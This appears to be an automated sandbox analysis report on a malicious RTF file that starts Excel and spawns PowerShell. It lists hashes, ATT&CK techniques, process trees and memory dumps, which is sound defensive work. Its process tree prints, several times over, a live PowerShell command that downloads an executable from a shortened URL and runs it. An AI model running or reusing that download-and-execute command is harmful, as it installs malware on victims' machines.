ecdf26dffbf572bde7ae3b7fbc4f92e958dcf41f047a8af086e131173c49090d

Analysis

max time kernel
117s
max time network
130s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
16-11-2024 12:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2020-01-13_104457.rtf
Size

1.6MB
MD5

c72b6a05064912fded813ede3595c6a5
SHA1

95a0fbdffa5f2084831716f1a488f8c3f1c7888a
SHA256

2644a076e344cf636e095c35ddec6cae24836bf76793fd311814075d74ec4f62
SHA512

0d36c16e21726c4143267872a660886cbecf0bc93b3abe80b4174a7a8a40fb28dcd023ae0d4cf006656ba76dc4a90cf4f8113707d9a0dc5895a77bbf54130cc4
SSDEEP

12288:ZHqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOQqKeOD:Zz

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bit.ly/2NmQqH7%20

Signatures

Process spawned unexpected child process 9 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1816	2280	powershell.exe	32
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1012	2944	powershell.exe	35
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2836	988	powershell.exe	38
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	628	876	powershell.exe	41
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2940	2988	powershell.exe	44
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2620	2316	powershell.exe	47
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2608	2824	powershell.exe	50
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2948	1048	powershell.exe	53
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1760	3036	powershell.exe	56

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2836	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1816	powershell.exe
2836	powershell.exe
628	powershell.exe
2948	powershell.exe
1760	powershell.exe
1012	powershell.exe
2940	powershell.exe
2620	powershell.exe
2608	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	excelcnv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3068	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1816	powershell.exe
1012	powershell.exe
2836	powershell.exe
628	powershell.exe
2940	powershell.exe
2620	powershell.exe
2608	powershell.exe
2948	powershell.exe
1760	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3068	WINWORD.EXE
3068	WINWORD.EXE
2280	EXCEL.EXE
2944	EXCEL.EXE
988	EXCEL.EXE
876	EXCEL.EXE
2988	EXCEL.EXE
2316	EXCEL.EXE
2824	EXCEL.EXE
1048	EXCEL.EXE
3036	EXCEL.EXE

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 1256	3068	WINWORD.EXE	31
PID 3068 wrote to memory of 1256	3068	WINWORD.EXE	31
PID 3068 wrote to memory of 1256	3068	WINWORD.EXE	31
PID 3068 wrote to memory of 1256	3068	WINWORD.EXE	31
PID 2280 wrote to memory of 1816	2280	EXCEL.EXE	33
PID 2280 wrote to memory of 1816	2280	EXCEL.EXE	33
PID 2280 wrote to memory of 1816	2280	EXCEL.EXE	33
PID 2280 wrote to memory of 1816	2280	EXCEL.EXE	33
PID 2944 wrote to memory of 1012	2944	EXCEL.EXE	36
PID 2944 wrote to memory of 1012	2944	EXCEL.EXE	36
PID 2944 wrote to memory of 1012	2944	EXCEL.EXE	36
PID 2944 wrote to memory of 1012	2944	EXCEL.EXE	36
PID 988 wrote to memory of 2836	988	EXCEL.EXE	39
PID 988 wrote to memory of 2836	988	EXCEL.EXE	39
PID 988 wrote to memory of 2836	988	EXCEL.EXE	39
PID 988 wrote to memory of 2836	988	EXCEL.EXE	39
PID 876 wrote to memory of 628	876	EXCEL.EXE	42
PID 876 wrote to memory of 628	876	EXCEL.EXE	42
PID 876 wrote to memory of 628	876	EXCEL.EXE	42
PID 876 wrote to memory of 628	876	EXCEL.EXE	42
PID 2988 wrote to memory of 2940	2988	EXCEL.EXE	45
PID 2988 wrote to memory of 2940	2988	EXCEL.EXE	45
PID 2988 wrote to memory of 2940	2988	EXCEL.EXE	45
PID 2988 wrote to memory of 2940	2988	EXCEL.EXE	45
PID 2316 wrote to memory of 2620	2316	EXCEL.EXE	48
PID 2316 wrote to memory of 2620	2316	EXCEL.EXE	48
PID 2316 wrote to memory of 2620	2316	EXCEL.EXE	48
PID 2316 wrote to memory of 2620	2316	EXCEL.EXE	48
PID 2824 wrote to memory of 2608	2824	EXCEL.EXE	51
PID 2824 wrote to memory of 2608	2824	EXCEL.EXE	51
PID 2824 wrote to memory of 2608	2824	EXCEL.EXE	51
PID 2824 wrote to memory of 2608	2824	EXCEL.EXE	51
PID 1048 wrote to memory of 2948	1048	EXCEL.EXE	54
PID 1048 wrote to memory of 2948	1048	EXCEL.EXE	54
PID 1048 wrote to memory of 2948	1048	EXCEL.EXE	54
PID 1048 wrote to memory of 2948	1048	EXCEL.EXE	54
PID 3036 wrote to memory of 1760	3036	EXCEL.EXE	57
PID 3036 wrote to memory of 1760	3036	EXCEL.EXE	57
PID 3036 wrote to memory of 1760	3036	EXCEL.EXE	57
PID 3036 wrote to memory of 1760	3036	EXCEL.EXE	57

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-01-13_104457.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1256

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1012

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:988
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2836

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:876
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:628

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2940

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2620

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2824
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2608

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2948

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2NmQqH7 ” , ”$ENv:teMp\1249.exe” ) ; stARt ”$ENv:tEMP\1249.exe”
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1760

C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
"C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
92b77e2823ecb1fd34d5d2cfe8f06b21

SHA1
c8a84f6737fcfe111bf009a547add1e46a0b79b3

SHA256
ee19771e8e036f0ad30ce6b268627ca3c7208c3af45ec7f671c6f5b904b086cc

SHA512
a934f19004a5d604972f91c87791e6eaad625715b0f086af6d464dfac3940065caa2748a67c74608dcfb1c661458dd89b906a5ef704b8e4b9308dcc8f140932c

Download Submit
memory/2280-48-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-100-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/2280-10-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-13-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-14-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-12-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-11-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-15-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-17-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-27-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-26-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-25-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-24-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-31-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-32-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-30-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-34-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-33-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-29-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-28-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-53-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-55-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-54-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-52-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-51-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-50-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-8-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-9-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-22-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-46-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-45-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-40-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-39-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-23-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-47-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-56-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-21-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-75-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-83-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-94-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-71-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-67-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-61-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-59-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-58-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-20-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-19-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-49-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-101-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/2280-18-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-16-0x0000000000310000-0x0000000000410000-memory.dmp

Filesize
1024KB

Download
memory/2280-7-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/3068-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3068-0-0x000000002F521000-0x000000002F522000-memory.dmp

Filesize
4KB

Download
memory/3068-2-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download
memory/3068-95-0x0000000070E2D000-0x0000000070E38000-memory.dmp

Filesize
44KB

Download